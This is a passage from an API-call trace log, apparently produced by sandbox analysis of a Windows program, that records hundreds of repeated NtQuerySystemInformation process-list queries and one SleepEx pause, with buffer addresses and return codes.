SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe8b0) returned 0x0 [0227.329] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0229.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, 